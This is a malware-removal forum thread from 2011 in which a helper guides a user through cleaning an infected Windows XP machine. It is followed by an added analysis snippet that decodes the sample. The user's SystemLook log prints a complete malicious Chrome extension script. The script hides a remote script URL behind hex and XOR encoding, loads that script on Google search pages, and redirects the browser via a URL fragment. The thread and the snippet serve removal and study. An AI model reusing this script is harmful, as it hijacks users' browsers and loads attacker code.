Unread postby ard » June 16th, 2011, 12:00 am

Hi -

step 1
removed old java

step 2
installed new java

step 3
ran eset - log below

step 4
ran DefenceInspector - log below


eset log

C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm\contentscript.js Win32/TrojanDownloader.Tracur.F trojan
C:\install\registryBooster\registrybooster.exe Win32/RegistryBooster application
C:\Qoobox\Quarantine\[4]-Submit_2011-06-13_16.51.31.zip multiple threats
C:\Qoobox\Quarantine\C\Documents and Settings\admin\0.15188298399276234.exe.vir a variant of Win32/Kryptik.OYY trojan
C:\System Volume Information\_restore{202550A8-7A33-4BCA-9586-051D24DDBF8F}\RP174\A0025682.exe Win32/Toolbar.Zugo application
C:\System Volume Information\_restore{202550A8-7A33-4BCA-9586-051D24DDBF8F}\RP198\A0046630.dll Win32/Toolbar.Zugo application
C:\System Volume Information\_restore{202550A8-7A33-4BCA-9586-051D24DDBF8F}\RP224\A0063082.exe a variant of Win32/Kryptik.OUM trojan
C:\System Volume Information\_restore{202550A8-7A33-4BCA-9586-051D24DDBF8F}\RP226\A0064497.exe a variant of Win32/Kryptik.OYY trojan
C:\System Volume Information\_restore{202550A8-7A33-4BCA-9586-051D24DDBF8F}\RP226\A0064512.sys Win32/Olmasco.E Trojan


Defence Inspector (Version 1.0.1)
Log created at 04:37:39 on June 15, 2011

-= System =-
Windows XP (32-bit, Service Pack 3)
Windows Update: Automatic installation
System Restore: ON (62 restore point(s) available)

-= User Accounts =-
admin (Admin)
Administrator (Admin)
Guest
HelpAssistant (Disabled)
SUPPORT_388945a0 (Disabled)

-= Security Programs =-
Avira AntiVir
Malwarebytes' Anti-Malware
Spybot S&D
SpywareBlaster
SUPERAntiSpyware
WinPatrol
Windows Firewall: Enabled

-= Other Programs =-
Adobe AIR 2.5.1.17730
Google Chrome (Version Unknown)
Internet Explorer 8.0.6001.18702
Java 1.6.0_26

-= EOF =-

Re: redirected searches and email problems

Unread postby melboy » June 16th, 2011, 1:19 pm

Hi

Just a little more to do - How are things running?

Some of the ESET findings were expected and will be dealt with in due course (qoobox entries & System Restore)

Again I would point out it is better to install programs to the %ProgramFiles% directory rather than the root of the C: drive. If the folder C:\install holds install/setup files for programs, it might be better to store those files in a folder in "My Documents" rather than where they are now. ;)

Concerning your e-mail problem. You don't appear to have Adobe Flash installed? Is there any reason why not?


Delete bad folders

Using Windows Explorer (right-click the Start button and left-click Explore), navigate to and find the following folder; if found, delete it.

    Folder:

  • C:\install\registryBooster


Registry Cleaners

Re. registryBooster

I don't personally recommend the use of ANY registry cleaners. Here is an excerpt from a discussion on reg cleaners:
    Most reg cleaners aren't bad as such, but they aren't perfect and even the best have been known to cause problems. The point we are trying to make is that the risk of using one far outweighs any benefit. If it does work perfectly you will not see any difference. If it doesn't work properly you may end up with an expensive doorstop.

This post by Bill Castner is very informative: WhatTheTech Forum



SystemLook

You should still have this on your desktop.

  • Double-click SystemLook.exe to run it.
  • Copy the content of the following codebox into the main textfield:
    Code:
    :dir
    C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm /s
    :contents
    C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm\contentscript.js
    

  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt

Re: redirected searches and email problems

Unread postby ard » June 16th, 2011, 5:19 pm

Hi -

things look good –

the Adobe Flash was trashed when the problem began – you asked that I not install new pgms so I am waiting.

I hope we can remove some of the 62 restore points and maybe some of the 628 hidden $xxxx subdirectories from the windows directory. That’s over 2500 files searched during scans.


step 1

C:\install\registryBooster deleted along with all other subdirectories.


step 2

ran SystemLook

C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm - Parameters: "/s"

---Files---
contentscript.js --a---- 4308 bytes [04:29 10/06/2011] [14:25 10/06/2011]
manifest.json --a---- 244 bytes [04:29 10/06/2011] [14:25 10/06/2011]

No folders found.

========== contents ==========

C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm\contentscript.js - Opened succesfully.

var cinfo = 'u=bc3188ef-13b7-4ad9-8434-fd8904c0fcea&a=1120&i=160&s=0';
var s1 = '475b5b5f150000181b011a1f011e1e18011e1f1800455c00455c4c015f475f', k1 = 47;var digitArray = new Array('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');
var hexv =
{
"00":0,"01":1,"02":2,"03":3,"04":4,"05":5,"06":6,"07":7,"08":8,
"09":9,"0A":10,"0B":11,"0C":12,"0D":13,"0E":14,"0F":15,"10":16,"11":17,
"12":18,"13":19,"14":20,"15":21,"16":22,"17":23,"18":24,"19":25,"1A":26,
"1B":27,"1C":28,"1D":29,"1E":30,"1F":31,"20":32,"21":33,"22":34,"23":35,
"24":36,"25":37,"26":38,"27":39,"28":40,"29":41,"2A":42,"2B":43,"2C":44,
"2D":45,"2E":46,"2F":47,"30":48,"31":49,"32":50,"33":51,"34":52,"35":53,
"36":54,"37":55,"38":56,"39":57,"3A":58,"3B":59,"3C":60,"3D":61,"3E":62,
"3F":63,"40":64,"41":65,"42":66,"43":67,"44":68,"45":69,"46":70,"47":71,
"48":72,"49":73,"4A":74,"4B":75,"4C":76,"4D":77,"4E":78,"4F":79,"50":80,
"51":81,"52":82,"53":83,"54":84,"55":85,"56":86,"57":87,"58":88,"59":89,
"5A":90,"5B":91,"5C":92,"5D":93,"5E":94,"5F":95,"60":96,"61":97,"62":98,
"63":99,"64":100,"65":101,"66":102,"67":103,"68":104,"69":105,"6A":106,"6B":107,
"6C":108,"6D":109,"6E":110,"6F":111,"70":112,"71":113,"72":114,"73":115,"74":116,
"75":117,"76":118,"77":119,"78":120,"79":121,"7A":122,"7B":123,"7C":124,"7D":125,
"7E":126,"7F":127,"80":128,"81":129,"82":130,"83":131,"84":132,"85":133,"86":134,
"87":135,"88":136,"89":137,"8A":138,"8B":139,"8C":140,"8D":141,"8E":142,"8F":143,
"90":144,"91":145,"92":146,"93":147,"94":148,"95":149,"96":150,"97":151,"98":152,
"99":153,"9A":154,"9B":155,"9C":156,"9D":157,"9E":158,"9F":159,"A0":160,"A1":161,
"A2":162,"A3":163,"A4":164,"A5":165,"A6":166,"A7":167,"A8":168,"A9":169,"AA":170,
"AB":171,"AC":172,"AD":173,"AE":174,"AF":175,"B0":176,"B1":177,"B2":178,"B3":179,
"B4":180,"B5":181,"B6":182,"B7":183,"B8":184,"B9":185,"BA":186,"BB":187,"BC":188,
"BD":189,"BE":190,"BF":191,"C0":192,"C1":193,"C2":194,"C3":195,"C4":196,"C5":197,
"C6":198,"C7":199,"C8":200,"C9":201,"CA":202,"CB":203,"CC":204,"CD":205,"CE":206,
"CF":207,"D0":208,"D1":209,"D2":210,"D3":211,"D4":212,"D5":213,"D6":214,"D7":215,
"D8":216,"D9":217,"DA":218,"DB":219,"DC":220,"DD":221,"DE":222,"DF":223,"E0":224,
"E1":225,"E2":226,"E3":227,"E4":228,"E5":229,"E6":230,"E7":231,"E8":232,"E9":233,
"EA":234,"EB":235,"EC":236,"ED":237,"EE":238,"EF":239,"F0":240,"F1":241,"F2":242,
"F3":243,"F4":244,"F5":245,"F6":246,"F7":247,"F8":248,"F9":249,"FA":250,"FB":251,
"FC":252,"FD":253,"FE":254,"FF":255
};

function ntos(n)
{
n=n.toString(16);
if (n.length == 1)
{
n="0"+n;
}
n="%"+n;
return unescape(n);
}

function toHex(n)
{
var result = '';
var start = true;
for (var i=32; i>0;)
{
i-=4;
var digit = (n>>i) & 0xf;
if (!start || digit != 0)
{
start = false;
result += digitArray[digit];
}
}
return (result==''?'0':result);
}

function pad(str, len, pad)
{
var result = str;
for (var i=str.length; i<len; i++)
{
result = pad + result;
}
return result;
}

function encodeHex(str)
{
var result = "";
for (var i=0; i<str.length; i++)
{
result += pad(toHex(str.charCodeAt(i)&0xff),2,'0');
}
return result;
}

function decodeHex(str)
{
str = str.toUpperCase().replace(new RegExp("s/[^0-9A-Z]//g"));
var result = "";
var nextchar = "";
for(var i=0; i<str.length; i++)
{
nextchar += str.charAt(i);
if(nextchar.length == 2)
{
result += ntos(hexv[nextchar]);
nextchar = "";
}
}
return result;
}

function xor(str, key)
{
var res="";
for(i = 0; i < str.length; ++i)
{
res+=String.fromCharCode(key^str.charCodeAt(i));
}
return res;
}

function _dec(s,k)
{
return xor(decodeHex(s),k);
}


if ( location.hostname.match(/.google.[a-z]{2,4}(?:.[a-z]{2,4})/) ) {
var m, q;
if (
location.pathname == '/search' &&
(m = location.search.match(/[?&]q=([^&]+)/))
) {
q = m[1];
}

if (q) {
var s = document.createElement('script');
var src = _dec(s1,k1);
s.src = src + '?'+cinfo;

document.body.appendChild(s);
}

}
var m;
if (m=location.hash.match(/^#rf=(.*)/)) {
var s = document.createElement('script');
s.innerHTML = 'top.location.href = "'+m[1]+'";';
document.body.appendChild(s);
}


-= EOF =-
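An added analysis example, not part of the thread or of the SystemLook log above: a clean re-implementation of the hex-plus-XOR string decoding that the quoted contentscript.js uses, plus a static model of its two branches, so an analyst can see what the script would do on a given page URL without executing the sample. The s1/k1 constants and the regular expressions are copied from the log; the function names, the verdict fields and the example hostnames are my own.

```javascript
// Added analysis helper, not part of the thread or of the SystemLook log.
// Constants copied verbatim from the contentscript.js sample in the log.
const SAMPLE_S1 = '475b5b5f150000181b011a1f011e1e18011e1f1800455c00455c4c015f475f';
const SAMPLE_K1 = 47;

// Hex string -> array of byte values. Rejects odd-length or non-hex input;
// the sample's own decodeHex() has no working filter here (its
// RegExp("s/[^0-9A-Z]//g") is a literal pattern, so that replace() is a no-op).
function hexToBytes(hex) {
  if (hex.length % 2 !== 0 || !/^[0-9a-fA-F]*$/.test(hex)) {
    throw new Error('invalid hex string: ' + hex);
  }
  const bytes = [];
  for (let i = 0; i < hex.length; i += 2) {
    bytes.push(parseInt(hex.slice(i, i + 2), 16));
  }
  return bytes;
}

// Equivalent of the sample's _dec(s, k): hex-decode, then XOR each byte with k.
// Single-byte XOR is its own inverse, so this also re-obfuscates plain text.
function decodeObfuscated(hex, key) {
  return hexToBytes(hex)
    .map((b) => String.fromCharCode(b ^ (key & 0xff)))
    .join('');
}

// Static model of the sample's two branches. `loc` carries the window.location
// fields the script reads (hostname, pathname, search, hash); the returned
// verdict says what the script would do on that page, without running it.
function triageLocation(loc) {
  const verdict = { remoteScriptUrl: null, triggerQuery: null, redirectsTo: null };

  // Branch 1: host pattern exactly as it appears in the log (dots unescaped).
  // Because the trailing group is not optional, the pattern needs a two-part
  // suffix such as google.co.uk; a plain google.com host does not match it.
  if (/.google.[a-z]{2,4}(?:.[a-z]{2,4})/.test(loc.hostname)) {
    const m = loc.pathname === '/search' && loc.search.match(/[?&]q=([^&]+)/);
    if (m) {
      // On a results page the script appends <decoded s1>?<cinfo> as a
      // <script> tag; the query only acts as the trigger, it is not sent.
      verdict.remoteScriptUrl = decodeObfuscated(SAMPLE_S1, SAMPLE_K1);
      verdict.triggerQuery = decodeURIComponent(m[1].replace(/\+/g, ' '));
    }
  }

  // Branch 2: a "#rf=<url>" fragment makes the script set top.location.href
  // to <url>, one of the redirect mechanisms visible in this sample.
  const rf = loc.hash.match(/^#rf=(.*)/);
  if (rf) {
    verdict.redirectsTo = rf[1];
  }
  return verdict;
}
```

Running decodeObfuscated on the sample's own s1/k1 yields the plain URL of the remote script the content script loads, which is the indicator an analyst would want to block and hunt for in proxy logs.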